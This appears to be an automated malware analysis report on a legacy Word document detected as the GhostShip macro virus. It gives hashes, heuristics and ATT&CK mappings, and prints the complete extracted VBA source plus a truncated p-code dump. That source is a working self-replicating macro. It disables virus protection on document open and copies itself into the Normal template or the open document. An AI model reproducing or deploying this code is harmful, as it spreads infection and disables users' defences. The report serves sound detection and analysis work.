Office (OLE) malware analysis — malicious · e6988c459eae8007

MALICIOUS

Office (OLE)

34.5 KB Created: 1998-08-22 21:04:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: ade7fca8ea347d1f7b8f7ab2c7305d2c SHA-1: e435dcd2d67bfa50662eb2be545535c087c28deb SHA-256: e6988c459eae800777ee92d02c8d62a12bc8da971414d89bf8c65720f124b30a

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains a VBA macro with a Document_Open subroutine, a common technique for auto-execution. The macro attempts to export its own code to temporary files and then manipulate the Normal template or the active document, suggesting an attempt at persistence or payload delivery. The ClamAV detection as 'Doc.Trojan.Ghostship-1' further supports its malicious nature.

Heuristics 4

ClamAV: Doc.Trojan.Ghostship-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Ghostship-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4729 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4729 bytes
SHA-256: `5df5cd57572c0d91b16783ad998d37d8a303d3999d7e3fc2dcf1fc59c60cb1b6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Options.VirusProtection = False NormalTemplate.VBProject.VBComponents(1).Export ("C:\Norm.bas") ActiveDocument.VBProject.VBComponents(1).Export ("C:\Virus.bas") Open "C:\Norm.bas" For Input As #9 On Error Resume Next If LOF(9) < 600 Then Open "C:\Virus.bas" For Input As #1 ElseIf LOF(1) < 600 Then Open "C:\Norm.bas" For Input As #1 Else Close #1, #9 GoTo NowISeeYou End If Do Until Chars = "Private Sub Document_Open()" Line Input #1, Chars Loop Do Line Input #1, Chars VirCode = VirCode & Chars & Chr(13) Loop Until Chars = "WrittenBy = LordArz" If LOF(9) < 600 Then NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.InsertLines 9, VirCode NormalTemplate.Save Else ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.InsertLines 9, VirCode ActiveDocument.Save End If Close #1, #9 Kill "C:\Virus.bas" NowISeeYou: Kill " C:\Norm.bas" Randomize Timer If Int(Rnd * 10) < 5 Then 'SetAttr "C:\Recycled", vbNormal 'RmDir "C:\Recycled" End If VirusName = GhostShip WrittenBy = LordArz End Sub ' Processing file: /opt/analyzer/scan_staging/dc67772e58594009b1688702a28e0fd6.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 8068 bytes ' Line #0: ' Line #1: ' Line #2: ' FuncDefn (Private Sub Document_Open()) ' Line #3: ' LitVarSpecial (False) ' Ld VirusProtection ' MemSt Save ' Line #4: ' LitStr 0x000B "C:\Norm.bas" ' Paren ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' ArgsMemCall Export 0x0001 ' Line #5: ' LitStr 0x000C "C:\Virus.bas" ' Paren ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' ArgsMemCall Export 0x0001 ' Line #6: ' LitStr 0x000B "C:\Norm.bas" ' LitDI2 0x0009 ' Sharp ' LitDefault ' Open (For Input) ' Line #7: ' OnError (Resume Next) ' Line #8: ' Line #9: ' LitDI2 0x0009 ' ArgsLd VirusName 0x0001 ' LitDI2 0x0258 ' Lt ' IfBlock ' Line #10: ' LitStr 0x000C "C:\Virus.bas" ' LitDI2 0x0001 ' Sharp ' LitDefault ' Open (For Input) ' Line #11: ' LitDI2 0x0001 ' ArgsLd VirusName 0x0001 ' LitDI2 0x0258 ' Lt ' ElseIfBlock ' Line #12: ' LitStr 0x000B "C:\Norm.bas" ' LitDI2 0x0001 ' Sharp ' LitDefault ' Open (For Input) ' Line #13: ' ElseBlock ' Line #14: ' LitDI2 0x0001 ' Sharp ' LitDI2 0x0009 ' Sharp ' Close 0x0002 ' Line #15: ' GoTo Sections ' Line #16: ' EndIfBlock ' Line #17: ' Line #18: ' Ld Chars ' LitStr 0x001B "Private Sub Document_Open()" ' Eq ' DoUnitil ' Line #19: ' LitDI2 0x0001 ' Ld Chars ' LineInput ' Line #20: ' Loop ' Line #21: ' Line #22: ' Do ' Line #23: ' LitDI2 0x0001 ' Ld Chars ' LineInput ' Line #24: ' Ld VirCode ' Ld Chars ' Concat ' LitDI2 0x000D ' ArgsLd Chr 0x0001 ' Concat ' St VirCode ' Line #25: ' Ld Chars ' LitStr 0x0013 "WrittenBy = LordArz" ' Eq ' LoopUntil ' Line #26: ' Line #27: ' LitDI2 0x0009 ' ArgsLd VirusName 0x0001 ' LitDI2 0x0258 ' Lt ' IfBlock ' Line #28: ' LitDI2 0x0009 ' Ld VirCode ' LitStr 0x000C "ThisDocument" ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemCall InsertLines 0x0002 ' Line #29: ' Ld NormalTemplate ' ArgsMemCall _B_var_GhostShip 0x0000 ' Line #30: ' ElseBlock ' Line #31: ' LitDI2 0x0009 ' Ld VirCode ' LitStr 0x000C "ThisDocument" ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemCall InsertLines 0x0002 ' Line #32: ' Ld ActiveDocument ' ArgsMemCall _B_var_GhostShip 0x0000 ' Line #33: ' EndIfBlock ' Line #34: ' LitDI2 0x0001 ' Sharp ' LitD ... (truncated)

SHA-256: 5df5cd57572c0d91b16783ad998d37d8a303d3999d7e3fc2dcf1fc59c60cb1b6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_Open()
Options.VirusProtection = False
NormalTemplate.VBProject.VBComponents(1).Export ("C:\Norm.bas")
ActiveDocument.VBProject.VBComponents(1).Export ("C:\Virus.bas")
Open "C:\Norm.bas" For Input As #9
On Error Resume Next

If LOF(9) < 600 Then
    Open "C:\Virus.bas" For Input As #1
    ElseIf LOF(1) < 600 Then
    Open "C:\Norm.bas" For Input As #1
    Else
    Close #1, #9
    GoTo NowISeeYou
End If

Do Until Chars = "Private Sub Document_Open()"
    Line Input #1, Chars
Loop

Do
    Line Input #1, Chars
    VirCode = VirCode & Chars & Chr(13)
Loop Until Chars = "WrittenBy = LordArz"

If LOF(9) < 600 Then
    NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.InsertLines 9, VirCode
    NormalTemplate.Save
    Else
    ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.InsertLines 9, VirCode
    ActiveDocument.Save
End If
Close #1, #9
Kill "C:\Virus.bas"
NowISeeYou:
Kill " C:\Norm.bas"
Randomize Timer
If Int(Rnd * 10) < 5 Then
'SetAttr "C:\Recycled", vbNormal
'RmDir "C:\Recycled"
End If
VirusName = GhostShip
WrittenBy = LordArz
End Sub

' Processing file: /opt/analyzer/scan_staging/dc67772e58594009b1688702a28e0fd6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8068 bytes
' Line #0:
' Line #1:
' Line #2:
' 	FuncDefn (Private Sub Document_Open())
' Line #3:
' 	LitVarSpecial (False)
' 	Ld VirusProtection 
' 	MemSt Save 
' Line #4:
' 	LitStr 0x000B "C:\Norm.bas"
' 	Paren 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #5:
' 	LitStr 0x000C "C:\Virus.bas"
' 	Paren 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #6:
' 	LitStr 0x000B "C:\Norm.bas"
' 	LitDI2 0x0009 
' 	Sharp 
' 	LitDefault 
' 	Open (For Input)
' Line #7:
' 	OnError (Resume Next) 
' Line #8:
' Line #9:
' 	LitDI2 0x0009 
' 	ArgsLd VirusName 0x0001 
' 	LitDI2 0x0258 
' 	Lt 
' 	IfBlock 
' Line #10:
' 	LitStr 0x000C "C:\Virus.bas"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Input)
' Line #11:
' 	LitDI2 0x0001 
' 	ArgsLd VirusName 0x0001 
' 	LitDI2 0x0258 
' 	Lt 
' 	ElseIfBlock 
' Line #12:
' 	LitStr 0x000B "C:\Norm.bas"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Input)
' Line #13:
' 	ElseBlock 
' Line #14:
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDI2 0x0009 
' 	Sharp 
' 	Close 0x0002 
' Line #15:
' 	GoTo Sections 
' Line #16:
' 	EndIfBlock 
' Line #17:
' Line #18:
' 	Ld Chars 
' 	LitStr 0x001B "Private Sub Document_Open()"
' 	Eq 
' 	DoUnitil 
' Line #19:
' 	LitDI2 0x0001 
' 	Ld Chars 
' 	LineInput 
' Line #20:
' 	Loop 
' Line #21:
' Line #22:
' 	Do 
' Line #23:
' 	LitDI2 0x0001 
' 	Ld Chars 
' 	LineInput 
' Line #24:
' 	Ld VirCode 
' 	Ld Chars 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St VirCode 
' Line #25:
' 	Ld Chars 
' 	LitStr 0x0013 "WrittenBy = LordArz"
' 	Eq 
' 	LoopUntil 
' Line #26:
' Line #27:
' 	LitDI2 0x0009 
' 	ArgsLd VirusName 0x0001 
' 	LitDI2 0x0258 
' 	Lt 
' 	IfBlock 
' Line #28:
' 	LitDI2 0x0009 
' 	Ld VirCode 
' 	LitStr 0x000C "ThisDocument"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #29:
' 	Ld NormalTemplate 
' 	ArgsMemCall _B_var_GhostShip 0x0000 
' Line #30:
' 	ElseBlock 
' Line #31:
' 	LitDI2 0x0009 
' 	Ld VirCode 
' 	LitStr 0x000C "ThisDocument"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #32:
' 	Ld ActiveDocument 
' 	ArgsMemCall _B_var_GhostShip 0x0000 
' Line #33:
' 	EndIfBlock 
' Line #34:
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitD
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.